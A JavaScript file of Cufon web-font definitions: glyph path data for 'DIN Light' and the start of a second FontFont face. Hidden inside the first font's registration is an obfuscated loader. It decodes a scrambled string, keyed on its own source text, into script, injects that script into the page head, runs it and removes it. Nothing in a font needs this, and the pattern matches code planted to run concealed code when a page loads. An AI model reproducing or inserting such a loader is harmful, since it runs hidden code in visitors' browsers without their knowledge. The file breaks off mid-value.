J":40,"A":10}},{"d":"154,-649r-63,0r0,-63r63,0r0,63xm148,0r-51,0r0,-482r51,0r0,482","w":245},{"d":"344,-42v114,0,190,-81,190,-196r0,-474r54,0r0,481v2,137,-105,237,-244,237v-139,0,-244,-100,-244,-237r0,-481r54,0r0,474v-2,115,76,196,190,196","w":688,"k":{"J":40}},{"d":"326,-670v-105,0,-159,70,-158,179r0,111r158,0r0,38r-158,0r0,294r314,0r0,48r-368,0r0,-342r-64,0r0,-38r64,0r0,-122v-2,-128,85,-218,212,-216v63,0,115,20,156,61r-37,37v-33,-32,-57,-50,-119,-50","w":537},{"d":"184,-436r-51,0r0,-350r51,0r0,350xm184,74r-51,0r0,-350r51,0r0,350","w":328},{"d":"383,-600r-58,0r0,-77r58,0r0,77xm175,-600r-58,0r0,-77r58,0r0,77","w":500},{"d":"338,74r-53,0r-285,-860r53,0","w":338},{"d":"112,-586v0,-91,58,-138,160,-126r0,45v-68,-5,-109,12,-109,80r0,105r109,0r0,38r-109,0r0,444r-51,0r0,-444r-66,0r0,-38r66,0r0,-104","w":304,"k":{"\u201d":-20,"\u201c":-20,"\u2019":-20,"\u2018":-20,"\u0153":20,"\u00e7":20,"\u00e6":20,"o":20,"e":20,"c":20,"a":20,".":50,"*":-20}},{"w":325},{"d":"158,-556r-63,0r0,-156r63,0r0,156","w":253},{"d":"275,-39v86,0,137,-56,136,-144r0,-299r51,0r0,482r-51,0r0,-57v-36,42,-83,63,-142,63v-109,1,-178,-70,-178,-180r0,-308r51,0r0,299v-1,90,45,144,133,144","w":559},{"w":121},{"d":"791,-240r-709,0r0,-47r709,0r0,47","w":873},{"d":"572,-54r-32,32r-75,-74v-75,64,-199,64,-274,0r-74,74r-32,-32r74,-74v-64,-75,-64,-200,0,-275r-74,-73r32,-32r74,73v74,-63,200,-63,274,0r75,-73r32,32r-74,73v62,74,63,201,0,275xm328,-96v91,0,169,-77,169,-169v0,-92,-78,-169,-169,-169v-91,0,-169,77,-169,169v0,92,78,169,169,169","w":657},{"d":"589,0r-54,0r0,-335r-371,0r0,335r-54,0r0,-712r54,0r0,329r371,0r0,-329r54,0r0,712","w":699},{"d":"628,-368v76,0,131,57,131,134r0,107v1,77,-55,134,-131,134v-76,0,-132,-57,-132,-134r0,-107v-1,-77,56,-134,132,-134xm603,-712r-332,712r-45,0r332,-712r45,0xm201,-719v76,0,131,57,131,134r0,107v1,77,-55,133,-131,133v-76,0,-132,-56,-132,-133r0,-107v-1,-77,56,-134,132,-134xm715,-129r0,-103v0,-65,-29,-98,-87,-98v-59,0,-88,33,-88,98r0,103v0,65,29,98,88,98v58,0,87,-33,87,-98xm288,-480r0,-103v0,-65,-29,-98,-87,-98v-59,0,-88,33,-88,98r0,103v0,65,29,97,88,97v58,0,87,-32,87,-97","w":828},{"d":"278,-265r-196,196r0,-66r130,-130r-130,-130r0,-66","w":320},{"d":"753,-285r-44,0r0,-328r-110,218r-46,0r-110,-218r0,328r-44,0r0,-427r44,0r133,270r133,-270r44,0r0,427xm320,-671r-122,0r0,386r-44,0r0,-386r-122,0r0,-41r288,0r0,41","w":809},{"d":"74,-414v39,-53,83,-73,170,-74v125,0,187,53,187,158r0,330r-51,0r0,-48v-40,39,-72,53,-147,54v-110,1,-177,-41,-177,-138v0,-93,70,-139,168,-139r156,0v8,-113,-23,-175,-136,-172v-72,2,-102,18,-133,61xm233,-39v96,0,148,-27,147,-129r0,-62r-150,0v-82,0,-123,32,-123,97v0,71,48,94,126,94xm382,-600r-58,0r0,-77r58,0r0,77xm174,-600r-58,0r0,-77r58,0r0,77","w":524},{"d":"187,-457v-1,55,26,83,79,79r0,44v-53,-4,-80,24,-79,79r0,207v1,100,-37,123,-137,122r0,-45v69,1,86,-7,86,-78r0,-207v1,-56,21,-80,61,-100v-40,-21,-60,-44,-61,-100r0,-207v1,-71,-16,-79,-86,-78r0,-45v99,-1,137,22,137,122r0,207","w":316},{"d":"165,-642r-70,70r0,-140r70,0r0,70","w":260,"k":{"\u00c6":80,"\u00c5":80,"\u00c4":80,"\u00c3":80,"\u00c2":80,"\u00c1":80,"\u00c0":80,"s":60,"J":120,"A":80}},{"d":"587,0r-58,0r-62,-173r-332,0r-62,173r-58,0r262,-712r48,0xm450,-221r-149,-419r-149,419r298,0xm301,-975v61,0,114,53,114,114v0,61,-53,115,-114,115v-61,0,-114,-54,-114,-115v0,-61,53,-114,114,-114xm301,-788v39,0,73,-34,73,-73v0,-39,-34,-72,-73,-72v-39,0,-73,33,-73,72v0,39,34,73,73,73","w":602,"k":{"\u0152":10,"y":15,"v":15,"Y":35,"W":10,"V":35,"T":60,"Q":10,"O":10,"G":10,"C":10}},{"w":255},{"d":"292,-164v56,-5,80,-24,113,-61r35,32v-43,47,-73,69,-148,74r0,119r-43,0r0,-121v-115,-15,-180,-111,-180,-245v0,-134,65,-230,180,-245r0,-101r43,0r0,99v75,5,105,27,148,74r-35,32v-33,-37,-57,-56,-113,-61r0,404xm249,-565v-87,17,-129,86,-129,199v0,113,42,182,129,199r0,-398","w":498},{"d":"244,-719v111,0,189,78,189,189v0,79,-34,133,-101,162v77,26,115,85,115,178v0,120,-85,198,-202,197v-118,0,-199,-65,-203,-180r51,0v4,86,67,134,152,135v87,1,151,-62,151,-152v0,-106,-56,-155,-167,-152r0,-45v102,3,153,-43,153,-143v0,-86,-56,-144,-138,-144v-85,0,-134,52,-142,130r-51,0v7,-104,85,-175,193,-175"},{"d":"313,-556r-63,0r0,-156r63,0r0,156xm158,-556r-63,0r0,-156r63,0r0,156","w":408},{"d":"146,-126v-4,70,38,86,109,81r0,45v-102,10,-160,-31,-160,-125r0,-587r51,0r0,586","w":287,"k":{"\u201d":60,"\u201c":60,"\u2019":60,"\u2018":60,"y":20,"w":20,"v":40,"o":20,"e":25,"c":25,"*":60}},{"d":"259,-718v99,0,181,78,179,176v-3,91,-86,177,-129,244v-18,29,-18,63,-18,107r-51,0v-2,-59,3,-94,29,-135v39,-62,113,-134,118,-216v4,-72,-56,-131,-128,-131v-74,0,-129,60,-128,131r-51,0v-2,-97,79,-176,179,-176xm299,0r-67,0r0,-67r67,0r0,67","w":488},{"d":"164,0r-54,0r0,-712r54,0r0,712xm274,-927r-106,147r-58,0r97,-147r67,0","w":274},{"d":"596,-431v109,0,149,121,84,203r-149,188r183,0r0,40r-236,0r0,-40r168,-213v44,-49,23,-141,-50,-138v-45,2,-75,27,-74,76r-44,0v-1,-68,48,-116,118,-116xm530,-712r-332,712r-45,0r332,-712r45,0xm169,-285r-44,0r0,-378r-80,71r0,-51r80,-69r44,0r0,427","w":764},{"d":"261,-718v112,0,190,75,188,187v0,49,-16,94,-49,137r-267,349r316,0r0,45r-377,0r0,-45r286,-375v79,-90,37,-259,-97,-253v-83,4,-139,52,-137,142r-51,0v-1,-110,76,-187,188,-187"},{"d":"423,-712v119,-1,197,84,197,205r0,507r-51,0r0,-59v-32,44,-78,66,-139,66v-130,0,-182,-95,-182,-248v0,-158,45,-248,181,-248v59,0,105,23,140,68r0,-89v1,-100,-58,-161,-155,-161r-132,0v-96,4,-154,54,-154,161r0,353v1,76,15,93,62,129r-35,35v-60,-43,-78,-67,-78,-164r0,-350v-1,-120,75,-205,196,-205r150,0xm434,-38v113,0,135,-90,135,-203v0,-113,-22,-203,-135,-203v-113,0,-135,90,-135,203v0,113,22,203,135,203","w":697},{"d":"181,-383v136,-59,267,39,267,182v0,115,-72,207,-188,207v-178,0,-225,-195,-149,-349r183,-369r51,0xm259,-39v86,0,138,-69,138,-158v0,-86,-51,-158,-138,-158v-87,0,-137,68,-137,158v0,91,50,158,137,158"},{"d":"587,0r-58,0r-62,-173r-332,0r-62,173r-58,0r262,-712r48,0xm450,-221r-149,-419r-149,419r298,0","w":602,"k":{"\u201d":80,"\u201c":80,"\u2019":80,"\u2018":80,"\u0152":10,"\u00d6":10,"\u00d5":10,"\u00d4":10,"\u00d3":10,"\u00d2":10,"\u00c7":10,"y":15,"v":15,"Y":35,"W":10,"V":35,"T":60,"Q":10,"O":10,"J":-15,"G":10,"C":10}},{"d":"273,-468v133,0,174,91,178,235v4,148,-57,239,-192,240v-114,1,-176,-60,-185,-164r51,0v11,79,55,119,134,119v106,0,141,-80,141,-195v0,-108,-26,-190,-133,-190v-64,0,-115,27,-129,75r-45,0r0,-364r342,0r0,45r-297,0r0,252v31,-35,76,-53,135,-53"},{"d":"257,-718v106,0,188,81,188,186v0,73,-32,127,-97,162v75,39,112,99,112,178v0,112,-90,198,-203,198v-113,0,-203,-86,-203,-198v0,-79,38,-138,113,-178v-65,-35,-98,-89,-98,-162v0,-105,82,-186,188,-186xm257,-391v80,0,137,-60,137,-141v0,-81,-57,-141,-137,-141v-80,0,-137,60,-137,141v0,81,57,141,137,141xm257,-39v85,0,152,-68,152,-153v0,-84,-68,-154,-152,-154v-84,0,-152,70,-152,154v0,85,67,153,152,153"},{"d":"254,-718v178,0,225,195,149,349r-183,369r-51,0r164,-329v-24,11,-52,17,-84,17v-113,2,-183,-87,-183,-199v0,-115,72,-207,188,-207xm254,-357v87,0,138,-68,138,-158v0,-90,-52,-158,-138,-158v-87,0,-137,68,-137,158v0,86,50,158,137,158"},{"d":"262,-488v135,0,201,109,193,258r-335,0v-1,115,49,190,157,190v66,0,95,-22,133,-58r38,30v-49,47,-87,74,-174,74v-142,0,-205,-96,-205,-247v0,-142,62,-247,193,-247xm404,-271v9,-130,-109,-214,-217,-150v-47,28,-64,77,-67,150r284,0xm397,-600r-58,0r0,-77r58,0r0,77xm189,-600r-58,0r0,-77r58,0r0,77","w":523,"k":{"y":10,"x":20,"w":5,"v":10}},{"d":"542,-664r-378,0r0,293r322,0r0,48r-322,0r0,323r-54,0r0,-712r432,0r0,48","w":576,"k":{"\u0153":40,"\u0152":20,"\u00f8":40,"\u00e6":40,"\u00d8":20,"\u00d6":20,"\u00d5":20,"\u00d4":20,"\u00d3":20,"\u00d2":20,"\u00c7":20,"z":30,"x":30,"u":30,"r":30,"p":30,"o":40,"n":30,"m":30,"e":40,"c":40,"a":40,"S":10,"Q":20,"O":20,"J":140,"G":20,"C":20,"A":60,".":100}},{"d":"184,74r-51,0r0,-860r51,0r0,860","w":317},{"d":"445,-69r-196,-196r196,-196r0,66r-130,130r130,130r0,66xm238,-69r-196,-196r196,-196r0,66r-130,130r130,130r0,66","w":527},{"d":"226,-715v105,0,154,77,154,196v0,120,-49,196,-154,196v-105,0,-154,-77,-154,-196v0,-120,49,-196,154,-196xm226,-362v80,0,111,-55,111,-157v0,-102,-30,-157,-111,-157v-80,0,-111,55,-111,157v0,102,30,157,111,157","w":452},{"d":"416,-482r-224,613v-21,66,-63,90,-148,87r0,-45v119,15,109,-101,146,-173r-176,-482r56,0r145,422r145,-422r56,0xm348,-600r-58,0r0,-77r58,0r0,77xm140,-600r-58,0r0,-77r58,0r0,77","w":430},{"w":243},{"d":"326,-42v103,-1,171,-70,189,-160r53,0v-19,119,-110,206,-242,208v-108,2,-214,-77,-234,-172v-13,-59,-12,-321,0,-380v20,-95,126,-174,234,-172v133,2,223,88,242,208r-55,0v-18,-91,-84,-159,-187,-160v-88,-1,-164,61,-180,141v-11,54,-11,292,0,346v16,80,92,142,180,141xm366,70r-64,150r-63,0r72,-150r55,0","w":644,"k":{"\u00c6":10,"Y":10,"X":10,"W":10,"V":10,"T":20,"J":40,"A":10}},{"d":"69,-241v0,-152,61,-247,194,-247v31,0,56,6,75,17r-67,-113r-117,0r0,-38r95,0r-53,-90r53,0r52,90r79,0r0,38r-57,0v54,108,134,185,134,343v0,152,-61,247,-194,247v-132,0,-194,-96,-194,-247xm263,-39v103,0,143,-72,143,-202v0,-131,-39,-202,-143,-202v-103,0,-143,72,-143,202v0,131,39,202,143,202","w":526},{"d":"69,-241v0,-149,42,-247,180,-247v61,0,109,23,143,68r0,-62r51,0r0,712r-51,0r0,-292v-34,45,-82,68,-143,68v-138,0,-180,-98,-180,-247xm256,-39v112,0,136,-90,136,-202v0,-113,-24,-202,-136,-202v-112,0,-136,90,-136,202v0,113,24,202,136,202","w":540},{"d":"629,0r-54,0r-411,-619r0,619r-54,0r0,-712r54,0r411,617r0,-617r54,0r0,712xm305,-884v35,0,92,47,125,45v17,0,37,-11,59,-33r30,29v-32,32,-62,48,-89,48v-31,0,-96,-45,-125,-45v-17,0,-37,11,-59,33r-30,-29v32,-32,62,-48,89,-48","w":739},{"d":"379,-403v-70,-58,-258,-67,-258,52v0,128,212,57,281,121v22,21,36,50,36,93v2,175,-297,177,-388,74r35,-35v37,39,90,59,158,59v97,0,145,-33,145,-98v0,-85,-93,-81,-172,-88v-97,-8,-145,-50,-145,-126v0,-157,245,-169,342,-86","w":494,"k":{"\u2019":60,"v":10,"t":10,"s":20}},{"d":"483,-712r-163,326r108,0r0,38r-127,0r-27,53r0,53r154,0r0,38r-154,0r0,204r-54,0r0,-204r-155,0r0,-38r155,0r0,-53r-27,-53r-128,0r0,-38r109,0r-164,-326r57,0r181,361r179,-361r56,0","w":493},{"d":"587,0r-58,0r-62,-173r-332,0r-62,173r-58,0r262,-712r48,0xm450,-221r-149,-419r-149,419r298,0xm451,-780r-57,0r-93,-109r-93,109r-57,0r123,-147r54,0","w":602,"k":{"\u0152":10,"y":15,"v":15,"Y":35,"W":10,"V":35,"T":60,"Q":10,"O":10,"G":10,"C":10}},{"d":"447,-718v195,0,362,167,362,362v0,195,-167,362,-362,362v-195,0,-362,-167,-362,-362v0,-195,167,-362,362,-362xm447,-38v167,0,314,-151,314,-318v0,-167,-147,-318,-314,-318v-167,0,-314,151,-314,318v0,167,147,318,314,318xm451,-522v-96,-1,-131,71,-132,166v0,110,44,165,132,165v37,0,70,-14,101,-41r30,30v-39,35,-82,52,-131,52v-117,2,-177,-90,-177,-206v0,-142,103,-245,246,-195v19,7,40,22,62,41r-30,30v-31,-28,-65,-42,-101,-42","w":894},{"d":"69,-241v0,-149,42,-247,180,-247v61,0,109,23,143,68r0,-292r51,0r0,712r-51,0r0,-62v-34,45,-82,68,-143,68v-138,0,-180,-98,-180,-247xm256,-39v112,0,136,-90,136,-202v0,-113,-24,-202,-136,-202v-112,0,-136,90,-136,202v0,113,24,202,136,202","w":540},{"d":"766,-67r-52,0r0,67r-44,0r0,-67r-170,0r0,-40r154,-320r47,0r-153,320r122,0r0,-120r44,0r0,120r52,0r0,40xm605,-712r-332,712r-45,0r332,-712r45,0xm176,-716v69,0,119,47,118,116v0,47,-19,78,-57,95v43,16,65,50,65,103v0,113,-136,156,-214,93v-24,-19,-37,-48,-38,-85r45,0v1,47,35,74,82,74v47,0,81,-33,81,-82v0,-57,-31,-83,-92,-81r0,-39v56,2,84,-23,84,-77v0,-47,-30,-77,-74,-77v-45,0,-73,28,-76,70r-44,0v4,-65,52,-110,120,-110","w":806},{"d":"194,-712r-3,520r-49,0r-3,-520r55,0xm200,0r-67,0r0,-67r67,0r0,67","w":304},{"d":"398,-608r-296,0r0,-46r296,0r0,46","w":500},{"d":"168,-716v109,0,149,121,84,203r-149,188r183,0r0,40r-236,0r0,-40r168,-213v44,-49,23,-141,-50,-138v-45,2,-75,27,-74,76r-44,0v-1,-69,48,-116,118,-116","w":336},{"d":"845,0r-431,0r0,-173r-255,0r-90,173r-59,0r377,-712r458,0r0,48r-378,0r0,284r322,0r0,48r-322,0r0,284r378,0r0,48xm414,-221r0,-443r-232,443r232,0","w":901},{"d":"164,0r-54,0r0,-712r54,0r0,712","w":274},{"d":"698,-482r-154,482r-52,0r-136,-402r-136,402r-52,0r-154,-482r56,0r123,422r138,-422r50,0r138,422r123,-422r56,0","w":712,"k":{"\u0153":5,"\u00f8":5,"\u00f6":5,"\u00f5":5,"\u00f4":5,"\u00f3":5,"\u00f2":5,"\u00eb":5,"\u00ea":5,"\u00e9":5,"\u00e8":5,"\u00e7":5,"\u00e6":5,"o":5,"e":5,"c":5,".":60}},{"d":"395,-476r-22,38r-120,-73r3,141r-45,0r3,-141r-120,73r-22,-38r123,-68r-123,-68r22,-38r120,73r-3,-141r45,0r-3,141r120,-73r22,38r-123,68","w":467},{"d":"66,-523v0,-117,84,-188,199,-194r0,-89r45,0r0,89v67,3,128,29,182,76r-35,35v-44,-39,-93,-61,-147,-65r0,290v131,16,218,65,218,190v0,122,-94,192,-218,196r0,109r-45,0r0,-108v-102,-6,-155,-37,-214,-94r38,-38v52,51,90,77,176,83r0,-295v-110,-9,-199,-69,-199,-185xm265,-671v-87,5,-146,58,-146,146v0,91,65,125,146,137r0,-283xm310,-43v93,-5,163,-53,164,-146v1,-97,-70,-136,-164,-141r0,287","w":587},{"d":"600,-514v9,40,8,286,0,323v-25,114,-123,191,-246,191r-233,0r0,-338r-81,0r0,-42r81,0r0,-332r240,0v124,-6,216,86,239,198xm548,-200v7,-41,6,-265,-1,-306v-16,-93,-99,-159,-200,-159r-172,0r0,285r178,0r0,42r-178,0r0,291r172,0v108,3,184,-60,201,-153","w":689},{"d":"344,-240r-262,0r0,-47r262,0r0,47","w":426},{"d":"416,-482r-176,482r-50,0r-176,-482r56,0r145,422r145,-422r56,0","w":430,"k":{"\u0153":10,"\u00f8":10,"\u00f6":10,"\u00f5":10,"\u00f4":10,"\u00f3":10,"\u00f2":10,"\u00eb":10,"\u00ea":10,"\u00e9":10,"\u00e8":10,"\u00e7":10,"\u00e6":10,"s":10,"o":10,"e":10,"c":10,"a":10,".":70}},{"d":"290,-488v109,-1,178,71,178,180r0,308r-51,0r0,-299v1,-90,-45,-144,-133,-144v-86,0,-137,56,-136,144r0,299r-51,0r0,-712r51,0r0,287v36,-42,83,-63,142,-63","w":559},{"d":"461,-107r-47,0r0,-133r-361,0r0,-47r408,0r0,180"},{"d":"262,-488v135,0,201,109,193,258r-335,0v-1,115,49,190,157,190v66,0,95,-22,133,-58r38,30v-49,47,-87,74,-174,74v-142,0,-205,-96,-205,-247v0,-142,62,-247,193,-247xm404,-271v9,-130,-109,-214,-217,-150v-47,28,-64,77,-67,150r284,0xm414,-590r-57,0r-93,-109r-93,109r-57,0r123,-147r54,0","w":523,"k":{"y":10,"x":20,"w":5,"v":10}},{"d":"154,-649r-63,0r0,-63r63,0r0,63xm-12,185v71,5,109,-10,109,-81r0,-586r51,0r0,587v1,93,-57,136,-160,125r0,-45","w":245},{"d":"69,-241v0,-149,42,-247,180,-247v61,0,109,23,143,68r0,-62r51,0r0,509v1,122,-75,211,-197,209v-82,-1,-109,-21,-159,-64r34,-34v40,34,59,52,125,53v130,2,156,-114,146,-253v-34,45,-82,68,-143,68v-138,0,-180,-98,-180,-247xm256,-39v112,0,136,-90,136,-202v0,-113,-24,-202,-136,-202v-112,0,-136,90,-136,202v0,113,24,202,136,202","w":540},{"d":"148,0r-51,0r0,-482r51,0r0,482xm261,-590r-58,0r-106,-147r67,0","w":245},{"d":"471,-117r-95,0r0,117r-51,0r0,-117r-282,0r0,-45r262,-550r54,0r-262,550r228,0r0,-226r51,0r0,226r95,0r0,45"},{"d":"257,-718v108,0,187,82,187,190r0,344v2,108,-79,190,-187,190v-108,0,-187,-82,-187,-190r0,-344v-2,-108,79,-190,187,-190xm257,-39v87,0,137,-64,136,-150r0,-334v1,-86,-49,-150,-136,-150v-87,0,-137,64,-136,150r0,334v-1,86,49,150,136,150"},{"d":"344,-42v114,0,190,-81,190,-196r0,-474r54,0r0,481v2,137,-105,237,-244,237v-139,0,-244,-100,-244,-237r0,-481r54,0r0,474v-2,115,76,196,190,196xm477,-790r-58,0r0,-77r58,0r0,77xm269,-790r-58,0r0,-77r58,0r0,77","w":687},{"d":"262,-488v135,0,201,109,193,258r-335,0v-1,115,49,190,157,190v66,0,95,-22,133,-58r38,30v-49,47,-87,74,-174,74v-142,0,-205,-96,-205,-247v0,-142,62,-247,193,-247xm404,-271v9,-130,-109,-214,-217,-150v-47,28,-64,77,-67,150r284,0","w":523,"k":{"y":10,"x":20,"w":5,"v":10}},{"d":"176,-716v69,0,119,47,118,116v0,47,-19,78,-57,95v43,16,65,50,65,103v0,113,-136,156,-214,93v-24,-19,-37,-48,-38,-85r45,0v1,47,35,74,82,74v47,0,81,-33,81,-82v0,-57,-31,-83,-92,-81r0,-39v56,2,84,-23,84,-77v0,-47,-30,-77,-74,-77v-45,0,-73,28,-76,70r-44,0v4,-65,52,-110,120,-110","w":352},{"d":"487,0r-63,0r-166,-265r-110,127r0,138r-51,0r0,-712r51,0r0,502r239,-272r65,0r-159,180","w":527,"k":{"\u0153":25,"\u00f6":25,"\u00f5":25,"\u00f4":25,"\u00f3":25,"\u00f2":25,"\u00eb":25,"\u00ea":25,"\u00e9":25,"\u00e8":25,"\u00e7":25,"\u00e6":25,"q":25,"o":25,"g":25,"e":25,"d":25,"c":25}},{"d":"610,-488v108,-1,177,70,177,180r0,308r-50,0r0,-299v1,-90,-45,-144,-133,-144v-82,-1,-136,53,-136,135r0,308r-51,0r0,-299v1,-90,-45,-144,-133,-144v-86,0,-137,56,-136,144r0,299r-51,0r0,-482r51,0r0,57v71,-92,253,-83,298,25v37,-59,92,-88,164,-88","w":878},{"d":"461,-316r-408,0r0,-47r408,0r0,47xm461,-163r-408,0r0,-47r408,0r0,47"},{"d":"416,-482r-224,613v-21,66,-63,90,-148,87r0,-45v119,15,109,-101,146,-173r-176,-482r56,0r145,422r145,-422r56,0","w":430,"k":{"\u0153":10,"\u00f8":10,"\u00f6":10,"\u00f5":10,"\u00f4":10,"\u00f3":10,"\u00f2":10,"\u00eb":10,"\u00ea":10,"\u00e9":10,"\u00e8":10,"\u00e7":10,"\u00e6":10,"o":10,"e":10,"c":10,"a":10,".":70}},{"d":"74,-414v39,-53,83,-73,170,-74v125,0,187,53,187,158r0,330r-51,0r0,-48v-40,39,-72,53,-147,54v-110,1,-177,-41,-177,-138v0,-93,70,-139,168,-139r156,0v8,-113,-23,-175,-136,-172v-72,2,-102,18,-133,61xm233,-39v96,0,148,-27,147,-129r0,-62r-150,0v-82,0,-123,32,-123,97v0,71,48,94,126,94xm366,-737r-106,147r-58,0r97,-147r67,0","w":524},{"d":"509,-664r-213,0r0,664r-54,0r0,-664r-212,0r0,-48r479,0r0,48","w":539,"k":{"\u0153":80,"\u0152":20,"\u00f8":80,"\u00e7":80,"\u00e6":80,"\u00d8":20,"\u00d6":20,"\u00d5":20,"\u00d4":20,"\u00d3":20,"\u00d2":20,"\u00c7":20,"\u00c6":60,"\u00c5":60,"\u00c4":60,"\u00c3":60,"\u00c2":60,"\u00c1":60,"\u00c0":60,"z":60,"y":60,"x":60,"w":60,"v":60,"u":60,"s":80,"r":60,"q":80,"p":60,"o":80,"n":60,"m":60,"g":80,"e":80,"d":80,"c":80,"a":80,"Q":20,"O":20,"J":80,"G":20,"C":20,"A":60,".":80}},{"d":"290,-488v109,-1,178,70,178,180r0,308r-51,0r0,-299v1,-90,-45,-144,-133,-144v-86,0,-137,56,-136,144r0,299r-51,0r0,-482r51,0r0,57v36,-42,83,-63,142,-63","w":559},{"d":"269,0v-101,11,-161,-35,-160,-126r0,-318r-66,0r0,-38r66,0r0,-154r51,0r0,154r109,0r0,38r-109,0r0,319v-1,68,41,86,109,80r0,45","w":325,"k":{"\u0153":10,"\u00e7":10,"\u00e6":10,"o":10,"e":10,"c":10,"a":10}},{"d":"291,-488v138,0,180,98,180,247v0,149,-42,247,-180,247v-61,0,-109,-23,-143,-68r0,292r-51,0r0,-942r51,0r0,292v34,-45,82,-68,143,-68xm284,-39v112,0,136,-90,136,-202v0,-113,-24,-202,-136,-202v-112,0,-136,90,-136,202v0,113,24,202,136,202","w":540},{"d":"263,-488v132,0,194,96,194,247v0,152,-61,247,-194,247v-132,0,-194,-96,-194,-247v0,-152,61,-247,194,-247xm263,-39v103,0,143,-72,143,-202v0,-131,-39,-202,-143,-202v-103,0,-143,72,-143,202v0,131,39,202,143,202","w":526,"k":{"y":10,"x":20,"w":5,"v":10}},{"d":"587,0r-58,0r-62,-173r-332,0r-62,173r-58,0r262,-712r48,0xm450,-221r-149,-419r-149,419r298,0xm348,-780r-58,0r-106,-147r67,0","w":602,"k":{"\u0152":10,"y":15,"v":15,"Y":35,"W":10,"V":35,"T":60,"Q":10,"O":10,"G":10,"C":10}},{"d":"169,-285r-44,0r0,-378r-80,71r0,-51r80,-69r44,0r0,427","w":249},{"d":"291,-488v138,0,180,98,180,247v0,149,-42,247,-180,247v-61,0,-109,-23,-143,-68r0,62r-51,0r0,-712r51,0r0,292v34,-45,82,-68,143,-68xm284,-39v112,0,136,-90,136,-202v0,-113,-24,-202,-136,-202v-112,0,-136,90,-136,202v0,113,24,202,136,202","w":540}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+-821-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("$3c:O6+[zP2d$g&>f6r4E3E2#n+:c62d#nV4zP8YcX-]Hb[t#mq%{3HW0:N:{}h6crN:{}h&+XN:{`,%HXN:{}h&urr!f@,%c3r!f@E%{}h!f@,%c`8!f@,4c3+!f@,%c@cG#mq%{3V6ir_!f@,%H`Xyq:h!f@,%c}c!f,hg}Gr3mEV$i{+u*J8L@qXP#HczO!f0y5(t`^&6Ye?SZ]BdQ%N4b[:nWD_U>-2|j@,%c@hu0&N:{}h`{Wh!f@,%c}(!f@,%H`f!f@,%Hb(!f@,%Hbr!f@,%Hn+!f@,%Hb8!f@,%c3cL*&N:{`,NcrN:{}h(cXN:{}htH:N:{`,%uXN:{`,4c&%Q#mq%{3E[#mq%{3J[#mq%{3Jb#mq%{@qb#mq%{38^#mq%{3qbPrN:{}h^H&N:{}h^+XN:{}h&cXN:{`,N{:N:{}h`u#_!f@,N+@VDPXN:{}h`cPr!f@E%{Pr!f@E%{P+!f@,%H6V!f@E%{@,-$:N:{}h6HL&!f@E%{}{d#mq%{3+(#mq%{3+6#mq%{3r(#mq%{3Hb#mq4{},n#mq%{3EnX&N:{`,4+&N:{}ht{XN:{`,NuGN!f@,%HP8!f@,4HbHU#mq%{38&#mq%{3H:ErN:{}h&uXN:{`,NcXN:{`,%+XN:{}h6H&N:{}h^uXN:{`,%{t(!f@,%c`&g#mq%{3c`#mq%{3+t#mq%{3X^#mq%{3EDP:N:{}h6u}r!f@,%c`r!f@,%H@f4#mq4{}GN#mq4{},NH:N:{`,buXN:{}h&{&f!f@E%{`V!f@,N+b(!f@E%{}f!f@,%H@r!f@,%c`c!f@,%H`,`u[X!f@,%c@f$HGB!f@,%c}V+#XN:{}h&c`f}#mq%{3H4@:N:{}h^+:e68n&X#mq%{3Gb#mq%{3Gn#mq%{3GD#rN6#mq4{},[VWX!f@E%{}(!f@E%{@8!f@,%H@8EVXN:{`,bHXN:{`G4{&N:{}h&+m:!f@E%{@&!f@,%HbX!f@,%H@h!f@,%H@Eb#gV]*:N:{}h`crN:{}htc}V,+^G:u}&!f@,%cPV3yrN:{}h(H&N:{}htHXN:{}h6c&N:{`,:c&N:{}h`+:N:{}h6{mr!f@,%c}rb#mq%{3G:#mq%{3{4#mq%{3G_crN:{}htcLr!f@,%HPc!f@,%H`V!f@,%HbcVf4e^#mq%{3J%i#ce#mq%{3r`#mq%{3X(z6f!f@,%cP{[{rN:{}h^HnX!f@,%H`+ZO@:_#mq%{3qNX3_[#mq%{3c&O:N:{}h`{rN:{}htuPEtiY+%O3&[$gEt$LN?*@,]!}:tiY,]O}:%i6N&O6f[zgNY*PEdct_YOm&%zm{20W[>zPHeHt_Qzb[Q#t5juYfWf:%d$@-e*b?bOPXt!6rdc3&dc:%dHn2Bym+[HPf?O6f!iY+BcPV4HP_^zP_Y#g_`On[?Vg2?iY8&!WJeO32`H#8?OnDdz32bf3_(OPq?$PcQ!t5>z@N]u4]ZzL&YPn+OzX:f*#hOzX:2$L5?")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":514,"face":{"font-family":"DIN Light","font-weight":300,"font-stretch":"normal","units-per-em":"1000","panose-1":"0 0 0 0 0 0 0 0 0 0","ascent":"800","descent":"-200","x-height":"6","bbox":"-12 -975 970 236.033","underline-thickness":"38","underline-position":"-122","unicode-range":"U+0020-U+2122"}}));
/*!
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 *  Dutch Design: Albert-Jan Pool, 1995. Published by FontShop International
 * FontFont release 15
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"464,-507r-224,608v-23,75,-81,108,-182,100r0,-92v59,2,83,-8,99,-54r28,-79r-177,-483r108,0r121,357r118,-357r109,0xm370,-761r-111,162r-77,0r75,-162r113,0","w":468},{"d":"316,-513v110,0,176,74,176,189r0,324r-102,0r0,-309v1,-71,-36,-113,-102,-113v-65,0,-105,43,-105,113r0,309r-102,0r0,-507r100,0r0,51v35,-38,80,-57,135,-57xm219,-726v39,0,93,44,130,43v19,0,38,-10,59,-31r48,47v-37,37,-71,55,-104,55v-39,0,-95,-43,-131,-42v-19,0,-38,10,-58,30r-48,-47v37,-37,71,-55,104,-55","w":568},{"d":"363,-575v131,-3,228,89,228,216v0,127,-97,215,-228,215r-162,0r0,144r-108,0r0,-712r108,0r0,137r162,0xm356,-241v74,1,126,-44,126,-118v0,-74,-52,-120,-126,-119r-155,0r0,237r155,0","w":637},{"d":"438,-432v43,23,63,50,63,115r0,165v2,119,-81,163,-208,152r0,-87